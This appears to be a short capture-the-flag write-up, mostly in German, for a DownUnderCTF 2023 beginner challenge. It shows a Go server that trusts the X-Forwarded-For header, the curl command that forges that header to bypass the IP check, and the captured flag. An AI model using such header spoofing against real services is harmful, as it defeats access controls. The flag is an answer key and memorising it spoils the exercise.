58 lines
1.2 KiB
Markdown
58 lines
1.2 KiB
Markdown
Go Source:
|
|
|
|
```go
|
|
package main
|
|
|
|
import (
|
|
"flag"
|
|
"fmt"
|
|
"log"
|
|
"net/http"
|
|
"os"
|
|
"strings"
|
|
)
|
|
|
|
var (
|
|
port = flag.Int("port", 8081, "The port to listen on")
|
|
)
|
|
|
|
func main() {
|
|
|
|
flag.Parse()
|
|
|
|
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
|
|
xff := r.Header.Values("X-Forwarded-For")
|
|
|
|
ip := strings.Split(r.RemoteAddr, ":")[0]
|
|
|
|
if xff != nil {
|
|
ips := strings.Split(xff[len(xff)-1], ", ")
|
|
ip = ips[len(ips)-1]
|
|
ip = strings.TrimSpace(ip)
|
|
}
|
|
|
|
if ip != "31.33.33.7" {
|
|
message := fmt.Sprintf("untrusted IP: %s", ip)
|
|
http.Error(w, message, http.StatusForbidden)
|
|
return
|
|
} else {
|
|
w.Write([]byte(os.Getenv("FLAG")))
|
|
}
|
|
})
|
|
|
|
log.Printf("Listening on port %d", *port)
|
|
log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
|
|
}
|
|
|
|
```
|
|
|
|
Es ist ziemlich eindeutig, dass man seine IP Adresse spoofen soll, um die Flagge aus den ENV vars zu lesen.
|
|
|
|
Ein hilfreicher Stack-Overflow Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl
|
|
|
|
=> SOLVED
|
|
```bash
|
|
┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
|
|
└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
|
|
DUCTF{17_533m5_w3_f0rg07_70_pr0x}
|
|
``` |